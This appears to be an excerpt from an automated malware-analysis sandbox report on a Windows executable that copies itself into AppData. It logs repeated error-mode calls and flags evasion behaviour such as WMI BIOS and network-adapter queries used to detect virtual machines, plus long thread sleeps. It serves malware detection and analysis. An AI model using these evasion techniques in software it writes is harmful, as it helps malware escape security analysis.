Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Window / User API: threadDelayed 780	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Window / User API: threadDelayed 651	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Window / User API: threadDelayed 466

Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 5836	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 4020	Thread sleep count: 780 > 30	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -87750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -58000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -56500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -56000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -55406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -54906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -54500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -80859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -53000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -52500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -77250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -51000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -74250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -47500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -46000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -45500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -44906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -44000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -43406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -42500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -42000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -41000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -40500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -39000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -37906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -55500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -52500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -50250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -49500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -89718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -59624s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -59124s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -57812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -57624s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -57406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -56406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -56218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -54406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -54124s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -80436s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -53406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -53218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -52624s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -52312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -52124s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -51906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -51718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -51218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -50812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -50406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -50124s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -49906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -49718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -49312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -73686s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -48406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -47124s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -45624s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -43812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -43624s >= -30000s	Jump to behavior
